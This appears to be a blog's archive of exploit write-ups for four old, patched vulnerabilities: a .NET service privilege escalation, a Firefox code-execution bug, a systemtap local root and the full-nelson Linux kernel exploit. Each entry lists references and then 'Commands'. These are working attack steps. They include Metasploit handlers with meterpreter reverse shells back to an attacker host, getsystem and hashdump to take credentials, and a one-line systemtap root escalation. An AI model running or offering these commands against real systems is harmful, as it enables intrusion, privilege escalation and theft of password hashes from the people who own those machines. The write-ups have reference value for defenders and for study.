Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

EDB-ID-16940 : Microsoft .NET Runtime Optimization Service Privilege Escalation

Timeline :

Vulnerability disclosed by XenoMuta on Exploit-DB on 2011-03-08
Metasploit PoC provided by David Rude on 2011-03-08

PoC provided by :

XenoMuta
David Rude

Reference(s) :

EDB-ID-16940
OSVDB-71013

Affected version(s) :

Microsoft .NET Framework 4.0 and 2.0

Tested on Windows XP SP3 with :

Microsoft .NET Framework v2.0.50727 (mscorsvw.exe)

Description :

This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary, so a low-privileged user can replace the service executable with one of their own. It seems to work on Windows XP SP3, 2003 R2 and 7.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
getuid
getsystem
hashdump
ps
migrate xxxx
background

use post/windows/escalate/net_runtime_modify
info
show options
set LHOST 192.168.178.21
set LPORT 4445
set SESSION 1
exploit

sessions -i 2
getuid
hashdump

CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit

Timeline :

Vulnerability discovered in the wild
Vulnerability corrected by the vendor on 2010-10-27
Vulnerability and Exploit-DB PoC disclosed by an unknown author on 2010-10-29
Metasploit PoC released on 2011-02-17

PoC provided by :

unknown
scriptjunkie

Reference(s) :

CVE-2010-3765
MFSA 2010-73
EDB-ID-15352
OSVDB-ID-68905

Affected version(s) :

All Firefox 3.6.x versions prior to 3.6.12
All Firefox 3.5.x versions prior to 3.5.15
All Thunderbird 3.1.x versions prior to 3.1.6
All Thunderbird 3.0.x versions prior to 3.0.10
All SeaMonkey 2.0.x versions prior to 2.0.10

Tested on Windows XP SP3 with :

Firefox 3.6.9, released on 2010-09-23

Description :

This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a Metasploit port of the in-the-wild exploit.

Commands :

use exploit/windows/browser/mozilla_interleaved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

CVE-2010-4170 : systemtap Local Root Privilege Escalation Vulnerability

Timeline :

Vulnerability reported to vendors by Tavis Ormandy on 2010-11-15
Vulnerability corrected by vendors around 2010-11-17

PoC provided by :

Tavis Ormandy

Reference(s) :

CVE-2010-4170

Affected version(s) :

Red Hat, Fedora, Debian, Ubuntu, etc.

Tested on Debian squeeze/sid with :

systemtap-runtime_1.0-2_i386.deb

Description :

It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

Requires the "systemtap-runtime" package on Debian

id
printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
id

full-nelson.c Linux Kernel local privilege escalation

Timeline :

CVE-2010-3849 reported by Nelson Elhage on 2010-10-18
CVE-2010-3850 reported by Nelson Elhage on 2010-10-18
CVE-2010-4258 reported by Nelson Elhage on 2010-12-02

PoC provided by :

Dan Rosenberg
Nelson Elhage

Reference(s) :

CVE-2010-3849
CVE-2010-3850
CVE-2010-4258

Affected version(s) :

All Linux kernel versions prior to 2.6.37

Tested on Ubuntu 10.10 server

Description :

This exploit leverages three vulnerabilities to get root, all of which were discovered by Nelson Elhage.

Commands :

uname -a
id
gcc full-nelson.c -o full-nelson
./full-nelson
id